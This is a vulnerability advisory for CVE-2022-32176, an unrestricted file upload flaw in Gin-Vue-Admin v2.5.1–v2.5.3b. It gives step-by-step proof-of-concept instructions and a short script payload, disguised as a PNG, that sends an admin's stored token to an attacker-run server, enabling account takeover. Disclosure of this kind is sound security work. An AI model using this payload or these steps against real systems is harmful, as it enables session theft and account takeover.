CVE-2022-32176

Overview

In "Gin-Vue-Admin", versions v2.5.1 through v2.5.3b are vulnerable to Unrestricted File Upload that leads to execution of javascript code, through the "Compress Upload" functionality to the Media Library. When an admin user views the uploaded file, a low privilege attacker will get access to the admin's cookie leading to account takeover.

Details

The "Gin-Vue-Admin" application is affected by the "Unrestricted File Upload" vulnerability, where a low privilege user can upload a HTML that contains a malicious Javascript code to the Media Library. When a victim views the file, the attacker will have access to the victim’s cookie and his account.

PoC Details

1. Access the application from a web browser and log in as an admin user.
2. Open a private window and log in as a regular (Low privileges) user.
3. Go to the personal information, click on the profile image, and then click on the 'Normal Upload' button.
4. Create a .png file with the code in the PoC code section below.
5. Create a HTTP server using python (python3 -m http.server 3333)
6. Select the takeover2.png and intercept the request.
7. Change the name of takeover2.png to takeover2.html and forward the request.
8. Go to the Media Library (Upload and Download) from the admin account and open the takeover.html ('Open image in New Tab'). This will trigger the XSS payload from takeover.html and send the admin cookie to the attacker's server, leading to account takeover.

PoC Code

takeover2.png file:

<script>
var i=new Image;
i.src="http://127.0.0.1:3333/?"+localStorage.getItem('token');
</script>

Affected Environments

Gin-Vue-Admin versions v2.5.1 through v2.5.3b

Prevention

No Fix